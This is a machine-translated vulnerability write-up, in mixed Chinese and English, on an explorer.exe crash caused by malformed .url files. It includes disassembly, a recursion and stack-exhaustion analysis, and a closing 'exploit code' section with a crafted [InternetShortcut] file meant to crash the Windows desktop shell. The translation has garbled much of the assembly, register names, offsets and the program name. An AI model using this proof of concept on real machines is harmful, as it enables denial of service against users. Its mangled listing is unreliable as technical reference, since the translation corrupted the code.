解析url格式化漏洞(Parsing URL formatting vulnerability)
解析url格式化漏洞(Parsing URL formatting vulnerability)
Parsing URL formatting vulnerability
Parsing URL formatting vulnerability
1. description
Windows's Shell program explorer.exe has problems dealing with the ".Url" file that contains malformed data, and a local attacker may exploit this vulnerability to crash the explorer.exe process on the user's machine.
If explorer.exe parses a *.url file that contains a special format URL, it can cause a crash. Even if the Explorer attempts to delete the file, it will crash.
At present, vendors have not yet provided patches or upgrade procedures, so far the vulnerability is still valid.
Sinohit address error code:
7D5CE6B9 push ECX
7D5CE6BA lea ECX, DWORD PTR [esp+8]
7D5CE6BE sub ECX, 1000
7D5CE6C4 sub eax, 1000
7D5CE6C9 test DWORD PTR [ecx], eax exception address
7D5CE6CB CMP eax, 1000
7D5CE6D0 JNB short 7D5CE6BE
7D5CE6D2 sub ECX, eax
7D5CE6D4 mov eax, ESP
7D5CE6D6 test DWORD PTR [ecx], eax
7D5CE6D8 mov ESP, ECX
7D5CE6DA mov ECX, DWORD PTR [eax]
7D5CE6DC mov eax, DWORD PTR [eax+4]
7D5CE6DF push eax
7D5CE6E0 Retn
2. detailed analysis
In the disassembly of IDA, we can see that:
Public: virtual long __stdcall CFileUrlStub:: ParseDisplayName (struct HWND__ *, struct IBindCtx *, unsigned
short *, unsigned long *, struct _ITEMIDLIST * *, unsigned long
*) proc near
.text:7D6A112C; DATA XREF:.Text:7D5A327C o
.text:7D6A112C
.text:7D6A112C var_20A0 = DWORD PTR -20A0h
.text:7D6A112C var_209C = DWORD PTR -209Ch
.text:7D6A112C var_2098 = DWORD PTR -2098h
.text:7D6A112C Srch = word PTR -2094h
.text:7D6A112C var_104C = DWORD PTR -104Ch
.text:7D6A112C var_4 = DWORD PTR -4
.text:7D6A112C arg_C = DWORD PTR 14h
.text:7D6A112C arg_14 = DWORD PTR 1Ch
.text:7D6A112C arg_18 = DWORD PTR 20h
.text:7D6A112C
.text:7D6A112C mov EDI, EDI
.text:7D6A112E push EBP
.text:7D6A112F mov EBP, ESP
.text:7D6A1131 mov eax, 20A0h local stack length
.text:7D6A1136 call __chkstk error function address
.text:7D6A1136
.text:7D6A113B mov eax, ___security_cookie
.text:7D6A1140 push ebx
.text:7D6A1141 mov ebx, [ebp+arg_18]
.text:7D6A1144 push ESI
.text:7D6A1145 mov ESI, [ebp+arg_14]
.text:7D6A1148 push EDI
.text:7D6A1149 mov EDI, [ebp+arg_C]
.text:7D6A114C push EDI
.text:7D6A114D mov [ebp+var_4], eax
.
text: 7d6a1150 call ds: urlgetlocationw (x)
text: 7d6a1156 push 0
text: 7d6a1158 mov [ebp + var _ 2098], eax
text: 7d6a115e push 6
text: 7d6a1160 lea eax, [ebp + var _ 209c]
text: 7d6a1166 push eax
text: 7d6a1167 lea eax, [ebp + var _ 104c + 2]
text: 7d6a116d push eax
text: 7d6a116e push edi
text: 7d6a116f mov [ebp + var _ 1-2000), 824h
text: 7d6a1179 mov [ebp + var _ 209c], 823h
text: 7d6a1183 call ds: urlgetpartw (x, x, x, x, x)
text: 7d6a1189 test eax, eax
text: 7d6a118b jl short loc _ 7d6a11a1
text: 7d6a118b
text: 7d6a118d cmp [ebp + var _ 209c] 0
text: 7d6a1194 jz short loc _ 7d6a11a1
text: 7d6a1194
text: 7d6a1196 mov word ptr [ebp + var _ 104c), 3fh
text: 7d6a119f jmp short loc _ 7d6a11a9
text: 7d6a119f
text: 7d6a11a1;
---------------------------------------------------------------------------
text: 7d6a11a1
text: 7d6a11a1 loc _ 7d6a11a1: code xref: cfileurlstub: parsedisplayname (hwnd _ _ *, ibindctx *, ushort *, ulong *, _ itemidlist * *, ulong *) + 5f j
text: 7d6a11a1; cfileurlstub: parsedisplayname (hwnd _ _ *, ibindctx *, ushort *, ulong *, _ itemidlist * *, ulong *) + 68 j
text: 7d6a11a1 and word ptr [ebp + var _ 104c] 0
text: 7d6a11a1
text: 7d6a11a9
text: 7d6a11a9 loc _ 7d6a11a9: code xref: cfileurlstub: parsedisplayname (hwnd _ _ *, ibindctx *, ushort *, ulong *, _ itemidlist * *, ulong *) + 73 j
text: 7d6a11a9 push 0
text: 7d6a11ab lea eax, [ebp + var _ 1-2000]
text: 7d6a11b1 push eax
text: 7d6a11b2 lea eax, [ebp + srch]
text: 7d6a11b8 push eax
text: 7d6a11b9 push edi
text: 7d6a11ba call ds: pathcreatefromurlw (x, x, x, x) 该函数递归
text: 7d6a11c0 test eax, eax
text: 7d6a11c2 jl short loc _ 7d6a121b
text: 7d6a11c2
text: 7d6a11c4 push ebx; int
text: 7d6a11c5 push esi; int
text: 7d6a11c6 xor edi, edi
.
正文:7d6a11c8推动EDI;焦
。正文:7d6a11c9推动EDI;int
。正文:7d6a11ca LEA EAX,[电子书+搜索]
。正文:7d6a11d0推eax;lpsrch
。正文:7d6a11d1叫ILCreateFromPathEx(x,x,x,x,x)
:
由于对参数检查不严格,造成这段函数不停地递规调用自已,每次都用堆栈0x20a0。由于Windows线程的堆栈不是无限增大的,超过他的最大范围就出错了。当进行第28次调用以后,达到了Windows堆栈所能允许的最大值,探险家程序异常退出。
3。利用代码
[ internetshortcut ]
文件:文件:文件:文件:文件:文件:文件:文件:文件:文件:文件:文件:文件:文件:文件:文件:文件:文件:文件:文件:文件:文件:文件:文件:文件:
把以上文字保成成URL为后缀的文件,可以造成桌面程序(寻找一直出错.exe)。